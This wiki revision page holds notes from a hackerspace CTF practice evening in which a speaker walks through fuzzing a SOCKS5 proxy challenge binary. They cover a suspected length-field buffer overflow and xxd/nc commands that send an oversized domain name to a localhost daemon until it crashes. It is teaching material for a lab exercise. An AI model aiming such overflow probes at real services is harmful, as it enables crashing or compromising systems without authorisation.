Difference between revisions of "CTF-practice-evening:2014-08-04"
Line 40: | Line 40: | ||
** xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (authentication) | ** xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (authentication) | ||
** hexdump -C file | ** hexdump -C file | ||
− | ** xxd -r -p <<< 050100 | + | ** xxd -r -p <<< 050100 0501000380:python<<<'print "A"*2000') | nc localhost 1080 | dd bs=1 > file (connection request) |
** We're following along w/ the protocol here | ** We're following along w/ the protocol here | ||
+ | ** It crashed - a child exited with Signal 6 (SIGABT) |
Revision as of 19:07, 4 August 2014
CTF-practice-evening:2014-08-04 | |
---|---|
Date | 2014/08/04 |
Time | |
Location | ACTA |
Type | Workshop |
Contact | Melanie |
Contents
Capture The Flag evening - Part 23
- 4 August, 2014 - 7 PM
- Please bring along a laptop with you!!!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
Binary Exploitation
- Brainsmoke is talking about binary exploitation today
Examining the challenge
- objdump -d: see the disassembly, sometimes you can see symbols
- This example has mangled C++ symbols
- From running it, the program appears to be a daemon of some kind - a Socks proxy
- This is a proxy for TCP - we can look at the protocol details w/ Google
- netstat -uplanet (we can see which ports are used)
- What was added between Socks4 and Socks5? (there might be a bug)
- Authentication and connecting directly to a domain
- Most of the fields are fixed length
- But the domain name is a string - it could have a buffer overflow
- There's a 1 byte name length - if you use a 1 byte length, you might end up w/ a negative number
- If you try to read a negative number, you will try to read a lot of bytes
- We want to find out what happens when you tell the program to read and send 255 bytes
- We want to establish a connection
- We need to specify Socks5
- Use xxd to construct the command (converts hex code to binary, and vice-versa)
- Example: xxd -r -p <<< 41414141410a = AAA
- xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (authentication)
- hexdump -C file
- xxd -r -p <<< 050100 0501000380:python<<<'print "A"*2000') | nc localhost 1080 | dd bs=1 > file (connection request)
- We're following along w/ the protocol here
- It crashed - a child exited with Signal 6 (SIGABT)